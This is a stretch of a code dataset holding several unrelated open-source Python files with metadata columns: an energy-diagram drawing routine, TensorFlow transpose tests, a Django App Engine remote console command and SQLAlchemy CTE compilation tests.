x = padding
for i in range(len(wells)):
well = wells[i]
rect = labelRects[i]
thisWellWidth = max(wellWidth, rect[2])
E0 = 0.001 * well.E0
y = y_E0 - E0 * Eslope
coordinates[i] = [x + 0.5 * thisWellWidth, y]
x += thisWellWidth + wellSpacing
width = x + padding - wellSpacing
# Determine the rectangles taken up by each well
# We'll use this to merge columns safely so that wells don't overlap
wellRects = []
for i in range(len(wells)):
l, t, w, h = labelRects[i]
x, y = coordinates[i,:]
if w < wellWidth: w = wellWidth
t -= 6 + Eheight
h += 6 + Eheight
wellRects.append([l + x - 0.5 * w, t + y + 6, w, h])
# Squish columns together from the left where possible until an isomer is encountered
oldLeft = numpy.min(coordinates[:,0])
Nleft = wells.index(network.isomers[0])-1
columns = []
for i in range(Nleft, -1, -1):
top = wellRects[i][1]
bottom = top + wellRects[i][3]
for j in range(len(columns)):
for c in columns[j]:
top0 = wellRects[c][1]
bottom0 = top + wellRects[c][3]
if (top >= top0 and top <= bottom0) or (top <= top0 and top0 <= bottom):
# Can't put it in this column
break
else:
# Can put it in this column
columns[j].append(i)
break
else:
# Needs a new column
columns.append([i])
for column in columns:
columnWidth = max([wellRects[c][2] for c in column])
x = coordinates[column[0]+1,0] - 0.5 * wellRects[column[0]+1][2] - wellSpacing - 0.5 * columnWidth
for c in column:
delta = x - coordinates[c,0]
wellRects[c][0] += delta
coordinates[c,0] += delta
newLeft = numpy.min(coordinates[:,0])
coordinates[:,0] -= newLeft - oldLeft
# Squish columns together from the right where possible until an isomer is encountered
Nright = wells.index(network.isomers[-1])+1
columns = []
for i in range(Nright, len(wells)):
top = wellRects[i][1]
bottom = top + wellRects[i][3]
for j in range(len(columns)):
for c in columns[j]:
top0 = wellRects[c][1]
bottom0 = top0 + wellRects[c][3]
if (top >= top0 and top <= bottom0) or (top <= top0 and top0 <= bottom):
# Can't put it in this column
break
else:
# Can put it in this column
columns[j].append(i)
break
else:
# Needs a new column
columns.append([i])
for column in columns:
columnWidth = max([wellRects[c][2] for c in column])
x = coordinates[column[0]-1,0] + 0.5 * wellRects[column[0]-1][2] + wellSpacing + 0.5 * columnWidth
for c in column:
delta = x - coordinates[c,0]
wellRects[c][0] += delta
coordinates[c,0] += delta
width = max([rect[2]+rect[0] for rect in wellRects]) - min([rect[0] for rect in wellRects]) + 2 * padding
# Draw to the final surface
surface = createNewSurface(format=format, target=path, width=width, height=height)
cr = cairo.Context(surface)
# Some global settings
cr.select_font_face("sans")
cr.set_font_size(self.options['fontSizeNormal'])
# Fill the background with white
cr.set_source_rgba(1.0, 1.0, 1.0, 1.0)
cr.paint()
# # DEBUG: Draw well bounding rectangles
# cr.save()
# cr.set_line_width(1.0)
# for rect in wellRects:
# cr.rectangle(*rect)
# cr.set_source_rgba(0.0, 0.0, 1.0, 0.5)
# cr.stroke()
# cr.restore()
# Draw path reactions
for rxn in network.pathReactions:
for reac in range(len(wells)):
if wells[reac].species == rxn.reactants:
break
else:
raise Exception
for prod in range(len(wells)):
if wells[prod].species == rxn.products:
break
else:
raise Exception
E0_reac = wells[reac].E0 * 0.001 - E0_offset
E0_prod = wells[prod].E0 * 0.001 - E0_offset
E0_TS = rxn.transitionState.conformer.E0.value_si * 0.001 - E0_offset
if reac < prod:
x1, y1 = coordinates[reac,:]
x2, y2 = coordinates[prod,:]
else:
x1, y1 = coordinates[prod,:]
x2, y2 = coordinates[reac,:]
x1 += wellSpacing / 2.0; x2 -= wellSpacing / 2.0
if abs(E0_TS - E0_reac) > 0.1 and abs(E0_TS - E0_prod) > 0.1:
if len(rxn.reactants) == 2:
if reac < prod: x0 = x1 + wellSpacing * 0.5
else: x0 = x2 - wellSpacing * 0.5
elif len(rxn.products) == 2:
if reac < prod: x0 = x2 - wellSpacing * 0.5
else: x0 = x1 + wellSpacing * 0.5
else:
x0 = 0.5 * (x1 + x2)
y0 = y_E0 - (E0_TS + E0_offset) * Eslope
width1 = (x0 - x1)
width2 = (x2 - x0)
# Draw horizontal line for TS
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.set_line_width(2.0)
cr.move_to(x0 - TSwidth/2.0, y0)
cr.line_to(x0+TSwidth/2.0, y0)
cr.stroke()
# Add background and text for energy
E0 = "{0:.1f}".format(E0_TS * 1000. * Emult)
extents = cr.text_extents(E0)
x = x0 - extents[2] / 2.0; y = y0 - 6.0
cr.rectangle(x + extents[0] - 2.0, y + extents[1] - 2.0, extents[2] + 4.0, extents[3] + 4.0)
cr.set_source_rgba(1.0, 1.0, 1.0, 0.75)
cr.fill()
cr.move_to(x, y)
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.show_text(E0)
# Draw Bezier curve connecting reactants and products through TS
cr.set_source_rgba(0.0, 0.0, 0.0, 0.5)
cr.set_line_width(1.0)
cr.move_to(x1, y1)
cr.curve_to(x1 + width1/8.0, y1, x0 - width1/8.0 - TSwidth/2.0, y0, x0 - TSwidth/2.0, y0)
cr.move_to(x0 + TSwidth/2.0, y0)
cr.curve_to(x0 + width2/8.0 + TSwidth/2.0, y0, x2 - width2/8.0, y2, x2, y2)
cr.stroke()
else:
width = (x2 - x1)
# Draw Bezier curve connecting reactants and products through TS
cr.set_source_rgba(0.0, 0.0, 0.0, 0.5)
cr.set_line_width(1.0)
cr.move_to(x1, y1)
cr.curve_to(x1 + width/4.0, y1, x2 - width/4.0, y2, x2, y2)
cr.stroke()
# Draw wells (after path reactions so that they are on top)
for i, well in enumerate(wells):
x0, y0 = coordinates[i,:]
# Draw horizontal line for well
cr.set_line_width(4.0)
cr.move_to(x0 - wellWidth/2.0, y0)
cr.line_to(x0 + wellWidth/2.0, y0)
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.stroke()
# Add background and text for energy
E0 = well.E0 * 0.001 - E0_offset
E0 = "{0:.1f}".format(E0 * 1000. * Emult)
extents = cr.text_extents(E0)
x = x0 - extents[2] / 2.0; y = y0 - 6.0
cr.rectangle(x + extents[0] - 2.0, y + extents[1] - 2.0, extents[2] + 4.0, extents[3] + 4.0)
cr.set_source_rgba(1.0, 1.0, 1.0, 0.75)
cr.fill()
cr.move_to(x, y)
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.show_text(E0)
# Draw background and text for label
x = x0 - 0.5 * labelRects[i][2]
y = y0 + 6
cr.rectangle(x, y, labelRects[i][2], labelRects[i][3])
cr.set_source_rgba(1.0, 1.0, 1.0, 0.75)
cr.fill()
self.__drawLabel(well, cr, x, y, format=format)
# Finish Cairo drawing
if format == 'png':
surface.write_to_png(path)
else:
surface.finish()
| mit | 6,278,887,971,954,168,000 | 38.367769 | 125 | 0.514223 | false |
theflofly/tensorflow | tensorflow/python/kernel_tests/transpose_op_test.py | 11 | 19816 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for Transpose op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.platform import test
class TransposeTest(test.TestCase):
def _np_transpose(self, x, perm):
ret = np.copy(x)
ret = ret.transpose(perm)
return ret
def _compareCpu(self, x, p, conjugate=False):
if p is None:
rank = x.ndim
perm = (rank - 1) - np.arange(rank)
else:
perm = p
np_ans = self._np_transpose(x, perm)
if conjugate:
np_ans = np.conj(np_ans)
with self.cached_session(use_gpu=False):
inx = ops.convert_to_tensor(x)
y = array_ops.transpose(inx, p, conjugate=conjugate)
tf_ans = self.evaluate(y)
self.assertShapeEqual(np_ans, y)
self.assertAllEqual(np_ans, tf_ans)
jacob_t = None
# Gradient check on CPU.
xs = list(np.shape(x))
ys = list(np.shape(tf_ans))
if x.dtype in [np.float32, np.complex64]:
jacob_t, jacob_n = gradient_checker.compute_gradient(inx, xs, y, ys, x,
1e-2)
self.assertAllClose(jacob_t, jacob_n, 1e-3, 1e-3)
elif x.dtype in [np.float64, np.complex128]:
jacob_t, jacob_n = gradient_checker.compute_gradient(inx, xs, y, ys, x,
1e-2)
self.assertAllClose(jacob_t, jacob_n, 1e-6, 1e-6)
return tf_ans, jacob_t
def _compareGpu(self, x, p, conjugate=False):
if p is None:
rank = x.ndim
perm = (rank - 1) - np.arange(rank)
else:
perm = p
np_ans = self._np_transpose(x, perm)
if conjugate:
np_ans = np.conj(np_ans)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
y = array_ops.transpose(inx, p, conjugate=conjugate)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
jacob_t = None
# Gradient check on GPU.
xs = list(np.shape(x))
ys = list(np.shape(tf_ans))
if x.dtype == np.float32:
jacob_t, jacob_n = gradient_checker.compute_gradient(inx, xs, y, ys, x,
1e-2)
self.assertAllClose(jacob_t, jacob_n, 1e-3, 1e-3)
elif x.dtype == np.float64:
jacob_t, jacob_n = gradient_checker.compute_gradient(inx, xs, y, ys, x,
1e-2)
self.assertAllClose(jacob_t, jacob_n, 1e-6, 1e-6)
return tf_ans, jacob_t
def _compare(self, x, use_gpu=False):
n = np.ndim(x)
# generate all permutations of [0, 1, ... n-1] in random order.
all_perm = np.random.permutation(
[p for p in itertools.permutations(range(n))]).astype(np.int32)
cs = [False, True] if x.dtype in [np.complex64, np.complex128] else [False]
for c in cs:
for p in all_perm[:2]:
self._compareCpu(x, p, conjugate=c)
if use_gpu:
self._compareGpu(x, p, conjugate=c)
# Test with an empty permutation
for c in cs:
self._compareCpu(x, None, conjugate=c)
if use_gpu:
self._compareGpu(x, None, conjugate=c)
def _compare_cpu_gpu(self, x):
n = np.ndim(x)
# generate all permutation of [0, 1, ... n-1] in random order,
# choose the first two.
perms = itertools.permutations(range(n))
for _ in range(2):
p = np.random.permutation(next(perms)).astype(np.int32)
tf_a_cpu, tf_g_cpu = self._compareCpu(x, p)
tf_a_gpu, tf_g_gpu = self._compareGpu(x, p)
assert tf_g_cpu is not None
assert tf_g_gpu is not None
if x.dtype == np.float32:
self.assertAllClose(tf_a_cpu, tf_a_gpu, 1e-3, 1e-3)
self.assertAllClose(tf_g_cpu, tf_g_gpu, 1e-3, 1e-3)
elif x.dtype == np.float64:
self.assertAllClose(tf_a_cpu, tf_a_gpu, 1e-6, 1e-6)
self.assertAllClose(tf_g_cpu, tf_g_gpu, 1e-6, 1e-6)
def _testBoth(self, x):
self._compare(x, use_gpu=False)
self._compare(x, use_gpu=True)
def testRank1(self):
self._compareCpu(np.arange(0., 2), [0])
def test1D(self):
vector = np.arange(0, 2).reshape((1, 1, 1, 2, 1))
self._compare(vector, use_gpu=False)
self._compare(vector, use_gpu=True)
def test5DGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
large_shapes = [[4, 10, 10, 10, 3], [4, 10, 10, 10, 8], [4, 10, 10, 10, 13],
[4, 3, 10, 10, 10], [4, 8, 10, 10, 10], [4, 13, 10, 10,
10]] * 3
perms = [[0, 4, 1, 2, 3]] * 3 + [[0, 2, 3, 4, 1]] * 3 + [[
4, 1, 2, 3, 0
]] * 6 + [[1, 2, 3, 4, 0]] * 6
datatypes = [np.int8, np.float16, np.float32, np.float64, np.complex128]
for datatype in datatypes:
for input_shape, perm in zip(large_shapes, perms):
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=datatype).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
def test4DGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
large_shapes = [[4, 10, 10, 3], [4, 10, 10, 8], [4, 10, 10, 13],
[4, 3, 10, 10], [4, 8, 10, 10], [4, 13, 10, 10]] * 3
perms = [[0, 3, 1, 2]] * 3 + [[0, 2, 3, 1]] * 3 + [[3, 1, 2, 0]] * 6 + [[
1, 2, 3, 0
]] * 3 + [[2, 3, 0, 1]] * 3
for input_shape, perm in zip(large_shapes, perms):
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=np.float32).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
# shapes related to Inception (taken from conv_ops_test.py)
inception_shapes = [[4, 5, 5, 124], [4, 8, 8, 38], [4, 8, 8, 38], [
4, 8, 8, 204
], [4, 8, 8, 44], [4, 8, 8, 204], [4, 8, 8, 204], [4, 8, 8, 204], [
4, 8, 8, 176
], [4, 8, 8, 176], [4, 8, 8, 176], [4, 8, 8, 176], [4, 17, 17, 19], [
4, 17, 17, 19
], [4, 17, 17, 124], [4, 17, 17, 12], [4, 17, 17, 124], [4, 17, 17, 22], [
4, 17, 17, 19
], [4, 17, 17, 19], [4, 17, 17, 121], [4, 17, 17, 121], [4, 17, 17, 22], [
4, 17, 17, 19
], [4, 17, 17, 19], [4, 17, 17, 115], [4, 17, 17, 115], [4, 17, 17, 19], [
4, 17, 17, 16
], [4, 17, 17, 115], [4, 17, 17, 102], [4, 17, 17, 12], [4, 17, 17, 102], [
4, 17, 17, 12
], [4, 17, 17, 102], [4, 17, 17, 12], [4, 17, 17, 76], [4, 17, 17, 12], [
4, 17, 17, 12
], [4, 17, 17, 76], [4, 17, 17, 76], [4, 35, 35, 9], [4, 35, 35, 28], [
4, 35, 35, 6
], [4, 35, 35, 28], [4, 35, 35, 25], [4, 35, 35, 4], [4, 35, 35, 25],
[4, 35, 35, 9], [4, 35, 35, 19], [4, 35, 35, 19],
[4, 35, 35, 19], [4, 73, 73, 6], [4, 73, 73,
6], [4, 147, 147, 2]]
for input_shape in inception_shapes:
perm = [0, 3, 1, 2]
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=np.float32).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
def test3DGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
datatypes = [np.int8, np.float16, np.float32, np.float64, np.complex128]
large_shapes = [[4, 1000, 3], [4, 1000, 8], [4, 1000, 13], [4, 3, 1000],
[4, 8, 1000], [4, 13, 1000]] * 3
perms = [[0, 2, 1]] * 6 + [[2, 1, 0]] * 6 + [[1, 2, 0]] * 3 + [[2, 0, 1]
] * 3
for datatype in datatypes:
for input_shape, perm in zip(large_shapes, perms):
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=datatype).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
def testLargeSizeGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
large_shapes = [[1000000, 31, 3], [3, 1000000, 31], [3, 31, 1000000],
[10000, 310, 3], [3, 10000, 310], [3, 310, 10000],
[2, 1000, 1000], [1000, 2, 1000], [1000, 1000, 2]]
perms = [[0, 2, 1]] * 9
for input_shape, perm in zip(large_shapes, perms):
total_size = np.prod(input_shape)
inp = np.arange(1, total_size + 1, dtype=np.float32).reshape(input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
def testRandomizedSmallDimLargeSizeGPU(self):
# If no GPU available, skip the test
if not test.is_gpu_available(cuda_only=True):
return
# Draw 10 random shapes with large dimension sizes.
# 40% prob to generate dim[0] size within [1, 2047]
# 40% prob to generate dim[0] size within [2048, 4095]
# 20% prob to generate dim[0] size within [4096, 100000]
# 50% prob to use dim[1] as the small dim (<16)
num_samples = 10
total_size = 500000
small_size_limit = 2048
large_size_limit = 95905
small_size_percentage = 0.4
medium_size_percentage = 0.4
large_size_percentage = 0.2
perms = [[0, 2, 1]] * num_samples
dim_zero_sizes = []
dim_zero_sizes += list(
np.random.randint(
small_size_limit, size=int(small_size_percentage * num_samples)) +
1)
dim_zero_sizes += list(
np.random.randint(
small_size_limit, size=int(medium_size_percentage * num_samples)) +
small_size_limit)
dim_zero_sizes += list(
np.random.randint(
large_size_limit, size=int(large_size_percentage * num_samples)) +
small_size_limit * 2)
input_shapes = []
small_dim_limit = 16
for dim_zero_size in dim_zero_sizes:
small_dim_size = np.random.randint(small_dim_limit - 1) + 1
large_dim_size = int(
total_size / dim_zero_size / small_dim_size) + small_dim_limit
input_shapes += ([[dim_zero_size, small_dim_size, large_dim_size]]
if np.random.randint(2) else
[[dim_zero_size, large_dim_size, small_dim_size]])
for input_shape, perm in zip(input_shapes, perms):
# generate input data with random ints from 0 to 9.
inp = np.random.randint(10, size=input_shape)
np_ans = self._np_transpose(inp, perm)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(inp)
y = array_ops.transpose(inx, perm)
tf_ans = self.evaluate(y)
self.assertAllEqual(np_ans, tf_ans)
self.assertShapeEqual(np_ans, y)
self._ClearCachedSession()
def testNop(self):
self._compareCpu(np.arange(0, 6).reshape([3, 2]).astype(np.float32), [0, 1])
def testSimple(self):
self._compareCpu(
np.arange(0, 8).reshape([2, 4]).astype(np.float32),
np.array([1, 0]).astype(np.int32))
def testPermType(self):
for perm_dtype in [np.int64, np.int32]:
x = np.arange(0, 8).reshape([2, 4]).astype(np.float32)
p = np.array([1, 0]).astype(perm_dtype)
np_ans = np.copy(x).transpose(p)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
inp = constant_op.constant(p)
y = array_ops.transpose(inx, inp)
tf_ans = self.evaluate(y)
self.assertShapeEqual(np_ans, y)
self.assertAllEqual(np_ans, tf_ans)
def testHalf(self):
self._compare(np.arange(0, 21).reshape([3, 7]).astype(np.float16))
self._compare(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.float16))
self._compare(
np.arange(0, 16).reshape([1, 2, 1, 2, 1, 2, 1, 2]).astype(np.float16))
def testFloat(self):
self._compare_cpu_gpu(np.arange(0, 21).reshape([3, 7]).astype(np.float32))
self._compare_cpu_gpu(
np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.float32))
self._compare_cpu_gpu(
np.arange(0, 16).reshape([1, 2, 1, 2, 1, 2, 1, 2]).astype(np.float32))
def testDouble(self):
self._compare_cpu_gpu(np.arange(0, 21).reshape([3, 7]).astype(np.float64))
self._compare_cpu_gpu(
np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.float64))
self._compare_cpu_gpu(
np.arange(0, 16).reshape([1, 2, 1, 2, 1, 2, 1, 2]).astype(np.float64))
def testComplex64(self):
self._testBoth(
np.complex(1, 2) *
np.arange(0, 21).reshape([3, 7]).astype(np.complex64))
self._testBoth(
np.complex(1, 2) *
np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.complex64))
self._testBoth(
np.complex(1, 2) *
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.complex64))
def testComplex128(self):
self._testBoth(
np.complex(1, 2) *
np.arange(0, 21).reshape([3, 7]).astype(np.complex128))
self._testBoth(
np.complex(1, 2) *
np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.complex128))
self._testBoth(
np.complex(1, 2) *
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.complex128))
def testInt8(self):
self._testBoth(np.arange(0, 21).reshape([3, 7]).astype(np.int8))
self._testBoth(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.int8))
self._testBoth(
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.int8))
def testInt16(self):
self._testBoth(np.arange(0, 21).reshape([3, 7]).astype(np.int16))
self._testBoth(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.int16))
self._testBoth(
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.int16))
def testInt32(self):
self._testBoth(np.arange(0, 21).reshape([3, 7]).astype(np.int32))
self._testBoth(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.int32))
self._testBoth(
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.int32))
def testInt64(self):
self._testBoth(np.arange(0, 21).reshape([3, 7]).astype(np.int64))
self._testBoth(np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.int64))
self._testBoth(
np.arange(0, 1260).reshape([2, 3, 5, 7, 2, 3]).astype(np.int64))
def testTranspose2DAuto(self):
x_np = [[1, 2, 3], [4, 5, 6]]
for use_gpu in [False, True]:
with self.cached_session(use_gpu=use_gpu):
x_tf = array_ops.transpose(x_np).eval()
self.assertAllEqual(x_tf, [[1, 4], [2, 5], [3, 6]])
def testSingletonDims(self):
# A singleton dimension is a dimension i with shape[i] == 1. Such dimensions
# can be collapsed and expanded using reshape without changing the
# underlying data storage. If all non-singleton dimensions remain in
# ascending order, the shuffled singletons will be transposed by a reshape,
# saving a memory allocation & copy. Since this gets a special code-path in
# transpose_op.cc, we test that the codepath is exercised and the results
# are as expected; we do not test that we save the memory allocation and
# copy here.
for shape in [[2, 1, 2], [2, 1, 2, 1, 1, 2], [1, 2, 2, 1, 1, 1],
[1, 1, 1, 2, 2, 2], [2, 2, 1, 1, 1]]:
self._compare_cpu_gpu(
np.arange(np.prod(shape)).reshape(shape).astype(np.float32))
def testTransposeShapes(self):
self.assertEqual(
[],
array_ops.transpose(array_ops.placeholder(
dtypes.int32, shape=[])).get_shape().dims)
self.assertEqual(
[100],
array_ops.transpose(array_ops.placeholder(
dtypes.int32, shape=[100])).get_shape().dims)
self.assertEqual(
[37, 100],
array_ops.transpose(
array_ops.placeholder(
dtypes.int32, shape=[100, 37])).get_shape().dims)
self.assertEqual(
[100, 37],
array_ops.transpose(
array_ops.placeholder(
dtypes.int32, shape=[100, 37]), [0, 1]).get_shape().dims)
self.assertEqual(
[15, 37, 100],
array_ops.transpose(
array_ops.placeholder(
dtypes.int32, shape=[100, 37, 15])).get_shape().dims)
self.assertEqual(
[15, 100, 37],
array_ops.transpose(
array_ops.placeholder(
dtypes.int32, shape=[100, 37, 15]), [2, 0, 1]).get_shape().dims)
self.assertEqual(
tensor_shape.TensorShape(None),
array_ops.transpose(array_ops.placeholder(dtypes.int32)).get_shape())
self.assertEqual(
tensor_shape.TensorShape(None),
array_ops.transpose(array_ops.placeholder(dtypes.int32),
[0]).get_shape())
def testNullTensor(self):
with self.cached_session():
x = constant_op.constant([], dtype=dtypes.float32, shape=[1, 4, 0])
xt = array_ops.transpose(x, [0, 2, 1]).eval()
self.assertAllEqual(xt.shape, (1, 0, 4))
def testScalar(self):
with self.cached_session():
x = constant_op.constant(42, dtype=dtypes.float32, shape=[])
xt = array_ops.transpose(x).eval()
self.assertAllEqual(xt, x)
def _testError(self, x, p, err):
with self.cached_session():
with self.assertRaisesOpError(err):
array_ops.transpose(x, p).eval()
def testError(self):
with self.assertRaises(ValueError):
array_ops.transpose(
np.arange(0., 30).reshape([2, 3, 5]), [[0, 1], [2, 3]])
with self.assertRaises(ValueError):
array_ops.transpose(np.arange(0., 30).reshape([2, 3, 5]), [0, 1, 3])
self._testError(
np.arange(0., 30).reshape([2, 3, 5]), [0, 1, 1], "2 is missing")
if __name__ == "__main__":
test.main()
| apache-2.0 | 5,516,664,797,517,688,000 | 38.632 | 80 | 0.571457 | false |
jackxiang/google-app-engine-django | appengine_django/management/commands/console.py | 49 | 1564 | #!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import code
import getpass
import os
import sys
from django.conf import settings
from django.core.management.base import BaseCommand
from google.appengine.ext.remote_api import remote_api_stub
def auth_func():
return raw_input('Username:'), getpass.getpass('Password:')
class Command(BaseCommand):
""" Start up an interactive console backed by your app using remote_api """
help = 'Start up an interactive console backed by your app using remote_api.'
def run_from_argv(self, argv):
app_id = argv[2]
if len(argv) > 3:
host = argv[3]
else:
host = '%s.appspot.com' % app_id
remote_api_stub.ConfigureRemoteDatastore(app_id,
'/remote_api',
auth_func,
host)
code.interact('App Engine interactive console for %s' % (app_id,),
None,
locals())
| apache-2.0 | 7,015,716,380,063,928,000 | 30.918367 | 79 | 0.642583 | false |
davidjb/sqlalchemy | test/sql/test_cte.py | 23 | 18962 | from sqlalchemy.testing import fixtures
from sqlalchemy.testing import AssertsCompiledSQL, assert_raises_message
from sqlalchemy.sql import table, column, select, func, literal
from sqlalchemy.dialects import mssql
from sqlalchemy.engine import default
from sqlalchemy.exc import CompileError
class CTETest(fixtures.TestBase, AssertsCompiledSQL):
__dialect__ = 'default'
def test_nonrecursive(self):
orders = table('orders',
column('region'),
column('amount'),
column('product'),
column('quantity')
)
regional_sales = select([
orders.c.region,
func.sum(orders.c.amount).label('total_sales')
]).group_by(orders.c.region).cte("regional_sales")
top_regions = select([regional_sales.c.region]).\
where(
regional_sales.c.total_sales > select([
func.sum(regional_sales.c.total_sales) / 10
])
).cte("top_regions")
s = select([
orders.c.region,
orders.c.product,
func.sum(orders.c.quantity).label("product_units"),
func.sum(orders.c.amount).label("product_sales")
]).where(orders.c.region.in_(
select([top_regions.c.region])
)).group_by(orders.c.region, orders.c.product)
# needs to render regional_sales first as top_regions
# refers to it
self.assert_compile(
s,
"WITH regional_sales AS (SELECT orders.region AS region, "
"sum(orders.amount) AS total_sales FROM orders "
"GROUP BY orders.region), "
"top_regions AS (SELECT "
"regional_sales.region AS region FROM regional_sales "
"WHERE regional_sales.total_sales > "
"(SELECT sum(regional_sales.total_sales) / :sum_1 AS "
"anon_1 FROM regional_sales)) "
"SELECT orders.region, orders.product, "
"sum(orders.quantity) AS product_units, "
"sum(orders.amount) AS product_sales "
"FROM orders WHERE orders.region "
"IN (SELECT top_regions.region FROM top_regions) "
"GROUP BY orders.region, orders.product"
)
def test_recursive(self):
parts = table('parts',
column('part'),
column('sub_part'),
column('quantity'),
)
included_parts = select([
parts.c.sub_part,
parts.c.part,
parts.c.quantity]).\
where(parts.c.part == 'our part').\
cte(recursive=True)
incl_alias = included_parts.alias()
parts_alias = parts.alias()
included_parts = included_parts.union(
select([
parts_alias.c.sub_part,
parts_alias.c.part,
parts_alias.c.quantity]).
where(parts_alias.c.part == incl_alias.c.sub_part)
)
s = select([
included_parts.c.sub_part,
func.sum(included_parts.c.quantity).label('total_quantity')]).\
select_from(included_parts.join(
parts, included_parts.c.part == parts.c.part)).\
group_by(included_parts.c.sub_part)
self.assert_compile(
s, "WITH RECURSIVE anon_1(sub_part, part, quantity) "
"AS (SELECT parts.sub_part AS sub_part, parts.part "
"AS part, parts.quantity AS quantity FROM parts "
"WHERE parts.part = :part_1 UNION "
"SELECT parts_1.sub_part AS sub_part, "
"parts_1.part AS part, parts_1.quantity "
"AS quantity FROM parts AS parts_1, anon_1 AS anon_2 "
"WHERE parts_1.part = anon_2.sub_part) "
"SELECT anon_1.sub_part, "
"sum(anon_1.quantity) AS total_quantity FROM anon_1 "
"JOIN parts ON anon_1.part = parts.part "
"GROUP BY anon_1.sub_part")
# quick check that the "WITH RECURSIVE" varies per
# dialect
self.assert_compile(
s, "WITH anon_1(sub_part, part, quantity) "
"AS (SELECT parts.sub_part AS sub_part, parts.part "
"AS part, parts.quantity AS quantity FROM parts "
"WHERE parts.part = :part_1 UNION "
"SELECT parts_1.sub_part AS sub_part, "
"parts_1.part AS part, parts_1.quantity "
"AS quantity FROM parts AS parts_1, anon_1 AS anon_2 "
"WHERE parts_1.part = anon_2.sub_part) "
"SELECT anon_1.sub_part, "
"sum(anon_1.quantity) AS total_quantity FROM anon_1 "
"JOIN parts ON anon_1.part = parts.part "
"GROUP BY anon_1.sub_part", dialect=mssql.dialect())
def test_recursive_union_no_alias_one(self):
s1 = select([literal(0).label("x")])
cte = s1.cte(name="cte", recursive=True)
cte = cte.union_all(
select([cte.c.x + 1]).where(cte.c.x < 10)
)
s2 = select([cte])
self.assert_compile(s2,
"WITH RECURSIVE cte(x) AS "
"(SELECT :param_1 AS x UNION ALL "
"SELECT cte.x + :x_1 AS anon_1 "
"FROM cte WHERE cte.x < :x_2) "
"SELECT cte.x FROM cte"
)
def test_recursive_union_no_alias_two(self):
"""
pg's example:
WITH RECURSIVE t(n) AS (
VALUES (1)
UNION ALL
SELECT n+1 FROM t WHERE n < 100
)
SELECT sum(n) FROM t;
"""
